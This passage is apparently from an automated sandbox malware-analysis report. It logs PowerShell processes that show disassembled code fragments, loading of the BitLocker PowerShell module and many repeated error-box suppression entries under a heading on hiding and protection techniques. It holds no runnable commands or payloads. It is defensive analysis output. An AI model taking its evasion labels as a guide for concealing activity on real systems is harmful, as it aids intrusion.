                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7978FD push ebx; retf 2_2_00007FFD9B79796A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7900BD pushad ; iretd 2_2_00007FFD9B7900C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B799DB8 push E85E4F20h; ret 2_2_00007FFD9B799DF9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B79752B push ebx; iretd 2_2_00007FFD9B79756A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B869051 push ecx; ret 2_2_00007FFD9B869053
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B869F8D push ecx; ret 2_2_00007FFD9B869FB3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B868F45 push ecx; ret 2_2_00007FFD9B868F63
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B868E8E push ecx; ret 2_2_00007FFD9B868EB3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B868699 push ecx; ret 2_2_00007FFD9B86869B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B869EB8 push 00000051h; ret 2_2_00007FFD9B869FB3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B864E45 push esi; ret 2_2_00007FFD9B864FA7
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8671CC push eax; retf 2_2_00007FFD9B8671CD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B866DCB push ecx; iretd 2_2_00007FFD9B866DCC
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B86A0E9 push 00000051h; ret 2_2_00007FFD9B86A0EB
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B868551 push ecx; ret 2_2_00007FFD9B868573
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B868948 push ecx; ret 2_2_00007FFD9B86894B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B777967 push ebx; retf 3_2_00007FFD9B77796A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B7700BD pushad ; iretd 3_2_00007FFD9B7700C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B778EE0 push FFFFFFE8h; ret 3_2_00007FFD9B778EF9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B847FEE push eax; iretd 3_2_00007FFD9B847FF0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B847EA3 push edx; iretd 3_2_00007FFD9B847EA4

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
